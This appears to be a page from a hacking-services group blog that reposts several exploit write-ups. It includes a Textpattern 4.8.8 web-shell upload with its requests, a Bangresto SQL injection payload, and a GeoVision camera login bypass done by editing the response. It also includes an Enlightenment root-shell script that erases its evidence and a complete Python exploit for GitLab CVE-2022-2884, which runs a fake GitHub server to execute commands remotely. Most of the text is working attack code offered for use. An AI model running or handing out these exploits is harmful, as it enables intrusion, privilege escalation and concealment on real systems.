Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863119633

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://textpattern.com/
# Version : 4.8.8
# Tested on: windows 11 xammp | Kali linux
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 10/09/2022
#
######## Description ########
#
#  Step 1: Login admin account and go settings of site
#  Step 2: Upload a file to web site and selecet the rce.php
#  Step3 : Upload your webshell that's it...
#
######## Proof of Concept ########


========>>> START REQUEST <<<=========




############# POST REQUEST (FILE UPLOAD) ############################## (1)

POST /textpattern/index.php?event=file HTTP/1.1
Host: localhost
Content-Length: 1038
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
Connection: close

------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="fileInputOrder"

1/1
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="app_mode"

async
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2000000
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="event"

file
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="step"

file_insert
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="id"


------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="_txp_token"

16ea3b64ca6379aee9599586dae73a5d
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryMgUEFltFdqBVvdJu--


############ POST RESPONSE (FILE UPLOAD) ######### (1)

HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:28:57 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Textpattern-Runtime: 35.38 ms
X-Textpattern-Querytime: 9.55 ms
X-Textpattern-Queries: 16
X-Textpattern-Memory: 2893 kB
Content-Length: 270
Connection: close
Content-Type: text/javascript; charset=utf-8

___________________________________________________________________________________________________________________________________________________

############ REQUEST TO THE PAYLOAD ############################### (2)

GET /files/c.php?cmd=whoami HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login_public=4353608be0admin
Connection: close


############ RESPONSE THE PAYLOAD ############################### (2)

HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:33:06 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Content-Length: 29
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>alpernae\alperen
</pre>

========>>> END REQUEST <<<=========
HireHackking 
## Exploit Title: Bangresto 1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 12.16.2022
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
## Demo: https://axcora.my.id/bangrestoapp/start.php
## Software: https://github.com/mesinkasir/bangresto
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto

## Description:
The `itemID` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database
error message was returned.
The attacker can be stooling all information from the database of this
application.

## STATUS: CRITICAL Vulnerability

[+] Payload:

```MySQL
---
Parameter: itemID (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT
(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)

## Proof and Exploit:
[href](https://streamable.com/moapnd)

## Time spent
`00:30:00`

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
HireHackking 
# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass 
# Device name: GV-ADR2701
# Date: 26 December , 2020
# Exploit Author: Chan Nyein Wai
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Firmware Version: V1.00_2017_12_15
# Tested on: windows 10

# Exploitation
1. Capture The Login Request with burp, Do intercept request to response

Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)
Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length: 46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1

{"UserName":"admin","Password":"0X]&0D]]05"}
```

2. The following is the normal response when you login to the server.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN

{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 460,
"StatusString": "PasswdError",
"Data": "null"
}
}
```

By editing the response to the following, you can successfully log in to
the web application.

```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN

{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 0,
"StatusString": "Succeed",
"Data": "null"
}
}
```
HireHackking 
## Exploit Title: Enlightenment v0.25.3 - Privilege escalation
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## CVE ID: CVE-2022-37706
## Description:
The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.
Enlightenment_sys in Enlightenment before 0.25.3 allows local users to
gain privileges because it is setuid root,
and the system library function mishandles pathnames that begin with a
/dev/.. substring
If the attacker has access locally to some machine on which the
machine is installed Enlightenment
he can use this vulnerability to do very dangerous stuff.

## STATUS: CRITICAL Vulnerability

## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```

[+] Exploit:

```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty

echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"

${file} /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
"/dev/../tmp/;/tmp/exploit" /tmp///net

read -p "Press any key to clean the evedence..."
echo -e "Please wait... "

sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Proof and Exploit:
[href](https://streamable.com/zflbgg)

## Time spent
`01:00:00`


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-12-25 # Exploit Author: Antonio Francesco Sardella # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://about.gitlab.com/install/ # Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1 # Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution) # CVE: CVE-2022-2884 # Category: WebApps # Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884 # Credits: yvvdwf (https://hackerone.com/reports/1672388) # This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884. # A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, # 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution # via the Import from GitHub API endpoint. # https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/ # DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments. # Please use this tool responsibly. I do not take responsibility for the way in which any one uses # this application. I am NOT responsible for any damages caused or any crimes committed by using this tool. import argparse import logging import validators import random import string import requests import time import base64 import sys from flask import Flask, current_app, request from multiprocessing import Process VERSION = "v1.0 (2022-12-25)" DEFAULT_LOGGING_LEVEL = logging.INFO app = Flask(__name__) def parse_arguments(): parser = argparse.ArgumentParser( description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}" ) parser.add_argument("-u", "--url", required=True, help="URL of the victim GitLab") parser.add_argument("-pt", "--private-token", required=True, help="private token of GitLab") parser.add_argument("-tn", "--target-namespace", required=False, default="root", help="target namespace of GitLab (default is 'root')") parser.add_argument("-a", "--address", required=True, help="IP address of the attacker machine") parser.add_argument("-p", "--port", required=False, type=int, default=1337, help="TCP port of the attacker machine (default is 1337)") parser.add_argument("-s", "--https", action="store_true", required=False, default=False, help="set if the attacker machine is exposed via HTTPS") parser.add_argument("-c", "--command", required=True, help="the command to execute") parser.add_argument("-d", "--delay", type=float, required=False, help="seconds of delay to wait for the exploit to complete") parser.add_argument("-v", "--verbose", action="store_true", required=False, default=False, help="verbose mode") return parser.parse_args() def validate_input(args): try: validators.url(args.url) except validators.ValidationFailure: raise ValueError("Invalid target URL!") if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"): raise ValueError("Invalid GitLab private token!") if len(args.target_namespace.strip()) < 1: raise ValueError("Invalid GitLab target namespace!") try: validators.ipv4(args.address) except validators.ValidationFailure: raise ValueError("Invalid attacker IP address!") if args.port < 1 or args.port > 65535: raise ValueError("Invalid attacker TCP port!") if len(args.command.strip()) < 1: raise ValueError("Invalid command!") if args.delay is not None and args.delay <= 0.0: raise ValueError("Invalid delay!") def generate_random_string(length): letters = string.ascii_lowercase + string.ascii_uppercase + string.digits return ''.join(random.choice(letters) for i in range(length)) def generate_random_lowercase_string(length): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def generate_random_number(length): letters = string.digits result = "0" while result.startswith("0"): result = ''.join(random.choice(letters) for i in range(length)) return result def base64encode(to_encode): return base64.b64encode(to_encode.encode("ascii")).decode("ascii") def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id): logging.info("Sending request to target GitLab.") protocol = "http" if is_https: protocol += "s" headers = { "Content-Type": "application/json", "PRIVATE-TOKEN": private_token, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" } fake_personal_access_token = "ghp_" + generate_random_string(36) new_name = generate_random_lowercase_string(8) logging.debug("Random generated parameters of the request:") logging.debug(f" fake_repo_id = {fake_repo_id}") logging.debug(f"fake_personal_access_token = {fake_personal_access_token}") logging.debug(f" new_name = {new_name}") payload = { "personal_access_token": fake_personal_access_token, "repo_id": fake_repo_id, "target_namespace": target_namespace, "new_name": new_name, "github_hostname": f"{protocol}://{address}:{port}" } target_endpoint = f"{url}" if not target_endpoint.endswith("/"): target_endpoint = f"{target_endpoint}/" target_endpoint = f"{target_endpoint}api/v4/import/github" try: r = requests.post(target_endpoint, headers=headers, json=payload) logging.debug("Response:") logging.debug(f"status_code = {r.status_code}") logging.debug(f" text = {r.text}") logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).") if r.status_code != 201: logging.fatal("Wrong response received from the target GitLab.") logging.debug(f" text = {r.text}") raise Exception("Wrong response received from the target GitLab.") except: logging.fatal("Error in contacting the target GitLab.") raise Exception("Error in contacting the target GitLab.") def is_server_alive(address, port, is_https): protocol = "http" if is_https: protocol += "s" try: r = requests.get(f"{protocol}://{address}:{port}/") if r.status_code == 200 and "The server is running." in r.text: return True else: return False except: return False def start_fake_github_server(address, port, is_https, command, fake_repo_id): app.config["address"] = address app.config["port"] = port protocol = "http" if is_https: protocol += "s" app.config["attacker_server"] = f"{protocol}://{address}:{port}" app.config["command"] = command app.config["fake_user"] = generate_random_lowercase_string(8) app.config["fake_user_id"] = generate_random_number(8) app.config["fake_repo"] = generate_random_lowercase_string(8) app.config["fake_repo_id"] = fake_repo_id app.config["fake_issue_id"] = generate_random_number(9) app.run("0.0.0.0", port) def encode_command(command): encoded_command = "" for c in command: encoded_command += ("<< " + str(ord(c)) + ".chr ") encoded_command += "<<" logging.debug(f"encoded_command = {encoded_command}") return encoded_command def generate_rce_payload(command): logging.debug("Crafting RCE payload:") logging.debug(f" command = {command}") encoded_command = encode_command(command) # Useful in order to prevent escaping hell... rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\"" logging.debug(f" rce_payload = {rce_payload}") return rce_payload def generate_user_response(attacker_server, fake_user, fake_user_id): response = { "avatar_url": f"{attacker_server}/avatars/{fake_user_id}", "events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}", "followers_url": f"{attacker_server}/users/{fake_user}/followers", "following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}", "gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}", "gravatar_id": "", "html_url": f"{attacker_server}/{fake_user}", "id": int(fake_user_id), "login": f"{fake_user}", "node_id": base64encode(f"04:User{fake_user_id}"), "organizations_url": f"{attacker_server}/users/{fake_user}/orgs", "received_events_url": f"{attacker_server}/users/{fake_user}/received_events", "repos_url": f"{attacker_server}/users/{fake_user}/repos", "site_admin": False, "starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}", "subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions", "type": "User", "url": f"{attacker_server}/users/{fake_user}" } return response def generate_user_full_response(attacker_server, fake_user, fake_user_id): partial = generate_user_response(attacker_server, fake_user, fake_user_id) others = { "bio": None, "blog": "", "company": None, "created_at": "2020-08-21T14:35:46Z", "email": None, "followers": 2, "following": 0, "hireable": None, "location": None, "name": None, "public_gists": 0, "public_repos": 0, "twitter_username": None, "updated_at": "2022-08-08T12:11:40Z", } response = {**partial, **others} return response def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id): response = { "allow_auto_merge": False, "allow_forking": True, "allow_merge_commit": True, "allow_rebase_merge": True, "allow_squash_merge": True, "allow_update_branch": False, "archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}", "archived": False, "assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}", "blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}", "branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}", "clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git", "collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}", "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}", "commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}", "compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}", "contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}", "contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors", "created_at": "2021-04-09T13:55:55Z", "default_branch": "main", "delete_branch_on_merge": False, "deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments", "description": None, "disabled": False, "downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads", "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events", "fork": False, "forks": 1, "forks_count": 1, "forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks", "full_name": f"{fake_user}/{fake_repo}", "git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}", "git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}", "git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}", "git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git", "has_downloads": True, "has_issues": True, "has_pages": False, "has_projects": True, "has_wiki": True, "homepage": None, "hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks", "html_url": f"{attacker_server}/{fake_user}/{fake_repo}", "id": int(repo_id), "is_template": False, "issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}", "issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}", "issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}", "keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}", "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}", "language": "Python", "languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages", "license": None, "merge_commit_message": "Message", "merge_commit_title": "Title", "merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges", "milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}", "mirror_url": None, "name": f"{fake_repo}", "network_count": 1, "node_id": base64encode(f"010:Repository{repo_id}"), "notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}", "open_issues": 4, "open_issues_count": 4, "owner": generate_user_response(attacker_server, fake_user, fake_user_id), "permissions": { "admin": True, "maintain": True, "pull": True, "push": True, "triage": True }, "private": True, "pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}", "pushed_at": "2022-08-14T15:36:21Z", "releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}", "size": 3802, "squash_merge_commit_message": "Message", "squash_merge_commit_title": "Title", "ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git", "stargazers_count": 0, "stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers", "statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}", "subscribers_count": 1, "subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers", "subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription", "svn_url": f"{attacker_server}/{fake_user}/{fake_repo}", "tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags", "teams_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams", "temp_clone_token": generate_random_string(32), "topics": [], "trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}", "updated_at": "2022-06-10T15:12:53Z", "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}", "use_squash_pr_title_as_default": False, "visibility": "private", "watchers": 0, "watchers_count": 0, "web_commit_signoff_required": False } return response def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command): rce_payload = generate_rce_payload(command) response = [ { "active_lock_reason": None, "assignee": None, "assignees": [], "author_association": "OWNER", "body": "hn-issue description", "closed_at": None, "comments": 1, "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments", "created_at": "2021-07-23T13:16:55Z", "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events", "html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3", "id": int(fake_issue_id), "labels": [], "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}", "locked": False, "milestone": None, "node_id": base64encode(f"05:Issue{fake_issue_id}"), "_number": 1, "number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}" }}, "performed_via_github_app": None, "reactions": { "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions" }, "repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test", "state": "open", "state_reason": None, "timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline", "title": f"{fake_repo}", "updated_at": "2022-08-14T15:37:08Z", "url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3", "user": generate_user_response(attacker_server, fake_user, fake_user_id) } ] return response @app.before_request def received_request(): logging.debug(f"Received request:") logging.debug(f" url = {request.url}") logging.debug(f"headers = {request.headers}") @app.after_request def add_headers(response): response.headers["content-type"] = "application/json; charset=utf-8" response.headers["x-ratelimit-limit"] = "5000" response.headers["x-ratelimit-remaining"] = "4991" response.headers["x-ratelimit-reset"] = "1660136749" response.headers["x-ratelimit-used"] = "9" response.headers["x-ratelimit-resource"] = "core" return response @app.route("/") def index(): return "The server is running." @app.route("/api/v3/rate_limit") def api_rate_limit(): response = { "resources": { "core": { "limit": 5000, "used": 9, "remaining": 4991, "reset": 1660136749 }, "search": { "limit": 30, "used": 0, "remaining": 30, "reset": 1660133589 }, "graphql": { "limit": 5000, "used": 0, "remaining": 5000, "reset": 1660137129 }, "integration_manifest": { "limit": 5000, "used": 0, "remaining": 5000, "reset": 1660137129 }, "source_import": { "limit": 100, "used": 0, "remaining": 100, "reset": 1660133589 }, "code_scanning_upload": { "limit": 1000, "used": 0, "remaining": 1000, "reset": 1660137129 }, "actions_runner_registration": { "limit": 10000, "used": 0, "remaining": 10000, "reset": 1660137129 }, "scim": { "limit": 15000, "used": 0, "remaining": 15000, "reset": 1660137129 }, "dependency_snapshots": { "limit": 100, "used": 0, "remaining": 100, "reset": 1660133589 } }, "rate": { "limit": 5000, "used": 9, "remaining": 4991, "reset": 1660136749 } } return response @app.route("/api/v3/repositories/<repo_id>") @app.route("/repositories/<repo_id>") def api_repositories_repo_id(repo_id: int): address = current_app.config["address"] port = current_app.config["port"] attacker_server = current_app.config["attacker_server"] fake_user = current_app.config["fake_user"] fake_user_id = current_app.config["fake_user_id"] fake_repo = current_app.config["fake_repo"] response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id) return response @app.route("/api/v3/repos/<user>/<repo>") def api_repositories_repo_user_repo(user: string, repo: string): address = current_app.config["address"] port = current_app.config["port"] attacker_server = current_app.config["attacker_server"] fake_user_id = current_app.config["fake_user_id"] fake_repo_id = current_app.config["fake_repo_id"] response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id) return response @app.route("/api/v3/repos/<user>/<repo>/issues") def api_repositories_repo_user_repo_issues(user: string, repo: string): attacker_server = current_app.config["attacker_server"] fake_user_id = current_app.config["fake_user_id"] fake_issue_id = current_app.config["fake_issue_id"] command = current_app.config["command"] response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command) return response @app.route("/api/v3/users/<user>") def api_users_user(user: string): attacker_server = current_app.config["attacker_server"] fake_user_id = current_app.config["fake_user_id"] response = generate_user_full_response(attacker_server, user, fake_user_id) return response @app.route("/<user>/<repo>.git/HEAD") @app.route("/<user>/<repo>.git/info/refs") @app.route("/<user>/<repo>.wiki.git/HEAD") @app.route("/<user>/<repo>.wiki.git/info/refs") def empty_response(user: string, repo: string): logging.debug("Empty string response.") return "" # All the others/non-existing routes. @app.route('/<path:path>') def catch_all(path): logging.debug("Empty JSON array response.") return [] def main(): args = parse_arguments() logging_level = DEFAULT_LOGGING_LEVEL if args.verbose: logging_level = logging.DEBUG logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s") validate_input(args) url = args.url.strip() private_token = args.private_token.strip() target_namespace = args.target_namespace.strip() address = args.address.strip() port = args.port is_https = args.https command = args.command.strip() delay = args.delay logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}") logging.debug("Parameters:") logging.debug(f" url = {url}") logging.debug(f" private_token = {private_token}") logging.debug(f"target_namespace = {target_namespace}") logging.debug(f" address = {address}") logging.debug(f" port = {port}") logging.debug(f" is_https = {is_https}") logging.debug(f" command = {command}") logging.debug(f" delay = {delay}") fake_repo_id = generate_random_number(9) fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id)) fake_github_server.start() logging.info("Waiting for the fake GitHub server to start.") while not is_server_alive(address, port, is_https): time.sleep(1) logging.debug("Waiting for the fake GitHub server to start.") logging.info("Fake GitHub server is running.") try: send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id) except: logging.critical("Aborting the script.") fake_github_server.kill() sys.exit(1) if delay is not None: logging.info(f"Waiting for {delay} seconds to let attack finish.") time.sleep(delay) else: logging.info("Press Enter when the attack is finished.") input() logging.debug("Stopping the fake GitHub server.") fake_github_server.kill() logging.info("Closing the script.") if __name__ == "__main__": main()
HireHackking

AD Manager Plus 7122 - Remote Code Execution (RCE)

HACKER · %s · %s

